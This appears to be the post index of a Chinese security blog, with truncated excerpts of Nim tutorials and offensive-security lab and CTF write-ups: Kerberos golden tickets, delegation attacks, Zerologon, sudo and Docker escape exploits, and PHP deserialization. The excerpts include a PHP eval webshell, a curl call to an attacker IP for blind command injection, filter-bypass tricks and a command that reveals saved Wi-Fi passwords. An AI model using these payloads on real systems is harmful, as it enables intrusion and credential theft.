blue_fantasy的博客

原创 JAVA安全基础知识

Text.一、什么是LDAPLIGHTWEIGHT DIRECTORY ACCESS Protocol轻量级目录访问协议（目录服务）类似于这样的树型组织结构，通过LDAP协议连接后像文件夹目录一样LDAP实现：AD域环境LDAP默认端口：389二、JNDI是什么？Java Naming and Directory Interface Java命名和目录接口（命名服务接口）用于根据名字找到位置、服务、信息、资源、对象等----KeyValue对基本操作：1.发布服务

原创 nim语言教程(三)

原创 nim语言教程(二)

0x00 proc过程proc hello() = echo "Hello"hello() #调用函数必须在函数定义的下方使用proc hello2(name: string) = echo namehello2("John")# Johnproc sum(num1, num2: int): int = result = num1 + num2echo sum(1,5) # 6proc multiSum(numbers: varargs[int

原创 nim语言实现简单计算器

Text.import strutilsvar input: stringvar num1: floatvar num2: floatvar result: floatwhile true: echo "Choose your action:Addition,Subtraction,Multiplication,Division,Exit" input = stdin.readLine case input: of "Addition": stdout.w

原创 nim语言教程(一)

0x00 字符串输入与输出字符串输入 ，let定义不可变变量字符串输出，可通过逗号分隔输出，echo后自带一个换行echo "Hello"echo ""#就会单独空一行echo ""echo "World"," 10 "," string 2"echo 10/2#按浮点型计算echo "strings ",10,5+5,5*20x01 变量，注释可变变量用varvar variableName = "Value"#变量初始化echo va

原创 实战中黄金票据的制作

Text.0x00 前言当控制了一台域控服务器的情况下，为了不打草惊蛇又为了长时间控制，可以考虑使用黄金票据进行权限维持。目前以控制一台域内成员机器WIN2016，ip：10.0.10.111 无杀软一台域控机器WIN2019，ip：10.0.10.110 有杀软域名：vulntarget.com域管：vulntarget\administrator域管密码：Admin@666通过之前的攻击，我们拿到了域管理员的账号密码，...

原创 约束委派攻击

Text.0x00 原理回顾首先回顾一下什么是委派？ 服务/用户 主机名 用户A hostA 服务B hostB 服务C hostC 委派就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C，委派需要提前在域控上进行配置，它可以理解成是一种权限。约束性委派原理由于⾮约束委派的不安全性（配置了⾮约束

原创 非约束委派攻击

Text.0x00 原理用户想访问服务A，于是向KDC提交认证，KDC发现A是非约束性委派，于是会把TGT放在ST中一并给用户。然后用户用这个ST去访问服务A，服务A就相当于获得了用户的TGT，把TGT放入lsass进程，然后就可以拿着用户的TGT以用户的身份去访问所有用户权限能够访问的服务了。0x01 非约束委派的启用找到Active Directory用户和计算机->Computers。给域内机器WIN7配置非约束委派右键属性->委派->信任此计算机来委派任何服

原创 CVE-2020-1472漏洞复现

Text.简介2020年8月11号，微软修复了Netlogon 特权提升漏洞，2020年9月11日，安全研究员Secura发布了公告，阐明了漏洞细节，之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”，CVSS评分为10.0，号称3秒撸域控，危害严重。攻击者在通过NetLogon（MS-NRPC）协议与AD域控建立安全通道时，可利用该漏洞将AD域控的计算机账号密码置为空，从而控制域控服务器。原理详细原理参看：ZeroLogon的利用以及分析 - 安全客，安全资讯平台本文对

原创 VulnHub-HA_Chanakya

Text.HackTheNmae：HA ChanakyaThe Mastermind that took down kingdoms is back and this time he has created a puzzle that would make you scratch you brains! It’s time to face Chanakya.Will you be able to solve this Boot to Root and prove that you are wiser

原创 快速查看电脑里存储过的WIFI密码

Text.netsh wlan show profiles（查询网络配置文件）（曾经正确输入密码链接过的WIFI）netsh wlan show profiles “wzt” key=clear（清除这个wifi的密码）（会爆出链接密码）

原创 kali编码问题与静态IP配置

Text.Kali编码问题解决当遇到查看某一信息出现乱码的情况，点击编辑->首选项选取中文再查看即可Kali静态IP配置我总是受kali动态ip的苦恼，每次登陆后都会换一个ip地址，这也不是没什么不好，在特定的情况下有他的好处，但是我做实验明显静态ip更舒服下以下是修改的方法：vi /etc/network/interfaces按i编辑auto eth0iface to inet loopbackauto eth0iface eth0 inet s.

原创 phpmyadmin getshell到提权

Text.环境准备：win7，phpstudy（包含phpmyadmin，可用旧版）开始攻击：通过弱口令，信息收集，爆破等方式获知phpmyadmin的账号密码是root root开始登录目标机器上的phpmyadmin2.检测MySQL全局变量（generallog、generallog file）的值。在SQL处输入sql语句： SHOW VARIABLES LIKE ‘general%’看到general log 指的是日志保存状态，一共有两个值（ON/OFF）ON

原创 ATT&CK实战|Vulnstack 红队（一）

Text.前期准备：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/下载虚拟机配置环境需要两张仅主机模式开启的网卡构造这样的内网环境，Kali和Win7的外网IP处于同一网段，可以进行攻击，而Win7还有内网网段，通过拿下Win7机器继续攻击其处于内网同一网段的Win2003及其域控服务器。首先登录Win7开启phpstudy，登陆密码hongrisec@2019，所有虚拟机密码都是这个。复现：因为在kali和win7在同

原创 De1CTF2020

Text.check in考点：文件上传过滤ph，短标签命令执行绕过，.htaccess攻击知识点：<?=和<? echo等价，从PHP5.4.0后起<?=总是可用的<?=eval($_POST[‘cmd’]);相当于<? echo eval($_POST[‘cmd’]);抓包，随便上传了个马，发现存在内容黑名单过滤了ph，尝试用短标签绕过本地测试了下，这样的短标签可以执行任意系统命令，system也可以于是我们去选择构造如下的payload

原创 内网穿透抓包

Text.提出问题： 通过ew反向代理后利用proxychains打开了火狐，访问了内网web端口，然后登录处想抓包爆破应该怎么设置这个代理呢？如果ew流量从1080端口走，bp也设置了1080这样会报端口占用了，如何解决呢？一、实验环境二、实验工具Earthworm：下载地址：http://rootkiter.com/EarthWorm/三、操作步骤首先模拟提前拿下一台Win7靶机，实战环境可通过蚁剑进行上传EW工具，注意根据实际环境上传对应系统版本的EW文件，实验这里我就

原创 读取向日葵配置信息攻击目标机

Text.一、本地搭建准备好安装包，在安装的过程中可以看到默认的安装路径是C:\Program Files\Oray\SunLogin\SunloginClient二、模拟攻击首先上线CS我这里本地就从自己得安装路径里找到config.ini的配置文件了，C:\Program Files\Oray\SunLogin\SunloginClient\config.ini如果安装路径做了修改可通过wmic process where processid=4580 get processid

原创 sudo本地提权漏洞

Text.这个漏洞太强了，我觉得近一段时间这个都可以维持了。这里贴上宽字节安全给的虚拟机链接。链接：https://pan.baidu.com/s/18Bc-HipGuBxq_Fg2dzZVlg提取码：unic虚拟机的用户名密码为 vagrant/unicodesecCVE-2021-3156: 缓冲区溢出漏洞在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户（普通用户和系统用户，sudoer和非sudoers）都可以利用此漏洞，而无需进行身份验证，攻击者不需要知道

原创 Docker逃逸漏洞复现（CVE-2019-5736）

Text.0x00 概述2019年2月11日，runc的维护团队报告了一个新发现的漏洞，该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736，漏洞影响在默认设置下运行的Docker容器，并且攻击者可以使用它来获得主机上的root级访问权限。0x01 漏洞原理漏洞点在于runc，runc是一个容器运行时，最初是作为Docker的一部分开发的，后来作为一个单独的开源工具和库被提取出来。作为“低级别”容器运行时，runc主

原创 CVE-2020-0796漏洞复现

Text.Text.网上现在已经有很多复现的文章了，我也做一个学习总结。0x00 漏洞描述2020年3月10日，微软在其官方SRC发布了CVE-2020-0796的安全公告（ADV200005，MicrosoftGuidance for Disabling SMBv3 Compression）,公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包

原创 通达OA RCE分析及复现

Text.▶漏洞描述通达OA是北京通达信科科技有限公司出品的 "Office Anywhere通达网络智能办公系统"。3月13日，通达OA在官方论坛发布通告称，近日接到用户反馈遭到勒索病毒攻击，提示用户注意安全风险，并且于同一天对所有版本发布了加固补丁。在受影响的版本中，攻击者可以在未认证的情况下向服务器上传jpg图片文件，然后包含该文件，造成远程代码执行。该漏洞无需登录即可触发。▶漏洞影响版本V11版 2017版 2016版 2015版 2013增.

原创 信息收集（GoogleHacking）

【查找关键页面】site:xxx.com inurl:.php?id=186 //指定查找URL当中以.php?id=186结尾的【查找后台地址】site:xxx.com inurl:login|admin|manage|admin_login|system|usersite:xxx.comintitle:后台|管理site:xxx.comintext:管理|系统【查找网站上传点】site:xxx.com inurl:f...

原创 原生类序列化

Text.原生类同名函数ZipArchive::open($filename,$flag)当$flag=ZipArchive::OVERWRITE时，就会将$filename的文件删除<?php$a = new ZipArchive();$a -> open("test.txt" , ZipArchive::OVERWRITE);?>在同级目录下新建一个test.txt文件，当如上代码设置时访问该页面，test.txt就会被删除，该方法PHP全版本通杀。接下来以

原创 有限字符下的任意命令执行总结

Text.因为网上已经有很多大牛写过类似的文章了，所以本篇文章是一个总结梳理学习。15位可控字符下的命令执行<?phphighlight_file(__FILE__);if(strlen($_GET[1])<15){ echo strlen($_GET[1]); echo shell_exec($_GET[1]);}else{ exit('too long');}因为只能传入14个字符，但是没有限制命令执行的次数，所以我们的思想可以通过Linux

原创 命令执行无回显的判断方法及DNSLOG相关例题的讲解

Text.命令无回显的情况判断方法1.延时2.HTTP请求3.DNS请求<?phphighlight_file(__FILE__);shell_exec($_GET[1]);?>（1）通过传入1=ls|sleep(3)页面加载3秒左右才显示来证明注入语句带入成功传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000（2）通过提前nc监听，利用curl命令进行信息获取（3）提前注册ceye.io平

原创 PHP反序列化字符串逃逸

Text.0x00 前提掌握PHP反序列化的原理，序列化的对应内容及POP链构造。可参看：https://xz.aliyun.com/t/3674，https://xz.aliyun.com/t/6454PHP的反序列化特点：01.PHP 在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的 ，同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。例如下图超出的abcd部分并不会被反序列化成功。02.当长度不对应的时

原创 内存取证与USB流量分析总结

Text.0x00 前言本文对我曾接触到过的CTF中的内存取证类题目与USB流量分析类题目进行一个总结类梳理。其中kali里集成了取证神器volatility与流量分析神器tshark0x01 Volatility第一步提取内容镜像信息常用命令volatility -f <xxx.vmem>(或xx.raw) imageinfo使用imageinfo插件获取到基本信息，特别是内存数据是什么操作系统下生成的，这点尤为重要 （如图的WinXPSP2x86） 因为在接下来每

原创 RCE的Bypass骚姿势

Text.提到RCE漏洞， 我们当然想用cat、chmod、whoami、ifconfig、ls等这些操作对不对！像这些敏感命令，防火墙就会进行过滤。还有特殊字符如单引、双引、空格等等 ，防火墙同样会进行过滤 。那么本篇来学习一下在CTF及实际渗透当中利用RCE的一些姿势空格绕过：在bash下可以用${IFS}、$IFS$9、<、>、<>、{,}、%20(space)、%09(tab, 在URL上使用较多 )这里我测>的时候会卡住，因为>指的是写入，就

原创 POP链学习

Text.__wakeup() //使用unserialize时触发__sleep() //使用serialize时触发__destruct() //对象被销毁时触发__call() //当程序调用到当前类中未声明或没权限调用的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //当程序调用一个未定义或不可见的成员变量时触发，请求类里不存在的属性则自动触发__set() //当程序试图写入一个不存在或不可见的成员变量时触发__isset()